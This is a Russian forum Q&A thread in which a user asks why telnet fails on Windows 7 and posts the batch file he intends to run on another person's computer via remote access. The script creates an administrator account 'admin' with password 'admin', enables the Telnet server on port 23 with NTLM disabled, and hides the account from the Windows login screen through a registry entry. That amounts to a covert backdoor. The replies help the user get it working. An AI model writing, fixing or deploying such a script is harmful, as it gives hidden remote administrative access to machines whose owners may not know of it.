Mail.ruПочтаМой МирОдноклассникиВКонтактеИгрыЗнакомстваНовостиКалендарьОблакоЗаметкиВсе проекты

Помогите с cmd на Windows 7 проблема с telnet

Данил Тихий Ученик (102), закрыт 13 лет назад
Здравствуйте у меня такая проблема работаю за границей человек попросил зделать ему программу на его компьютер и перекинуть ее через удаленный доступ ну вот я написал бат файл сначала проверил на своем компьютере так вот что получилось я запустил этот бат файл на Windows XP 2002 зашел в cmd заметьте cmd зделана Microsoft Windows XP [Версия 5.1.2600]
(С) Корпорация Майкрософт, 1985-2001. так вот ввожу telnet далее ввожу open далее свой айпи внутрений стандарт как у всех 127,0,0,1 подключаюсь пароля на компьютере нет все стандарт ввожу login: admin , password; когда нет пароля пишем admin а вот писать пароль не могу никак почему то пробую нажать enter пишет что не могу подключится потому что пароль не введен тоесть не ввел admin а в Windows 7 тоже решил проверить бат файл открыл его зашел в cmd Microsoft Windows [Version 6.1.7600] (C) Корпарация Майкрософт, 2009. Все права защищены.!! А в cmd на Windows 7 ввожу telnet пишет ( "telnet" не является внутренней или внешней командой, исполняемой программой или пакетным файлом.)

Вот функции которые я писал в .bat файл:

chcp 1251

net user admin admin /add

net localgroup Администраторы admin /add

sc config tlntsvr start= auto

tlntadmn config port=23 sec=-NTLM

net start Telnet

REG ADD "HKLM\SOFTWARE\Microsoft\Win
dowsNT\CurrentVersion\Winlogon\SpecialAccounts\UserList\admin" /v admin /t reg_d
word /d 0000000

Помогите в чем дело ! ?
Лучший ответ
Katze von Ulthar Оракул (60452) 13 лет назад
telnet по умолчанию не ставится в семерке. запусти установку компонентов виндовс и поставь его, и все будет
Остальные ответы
Александр Цуриков Ученик (110) 13 лет назад
Попробуй создать учетную запись у себя, как стоит на удаленном компьютере.
Похожие вопросы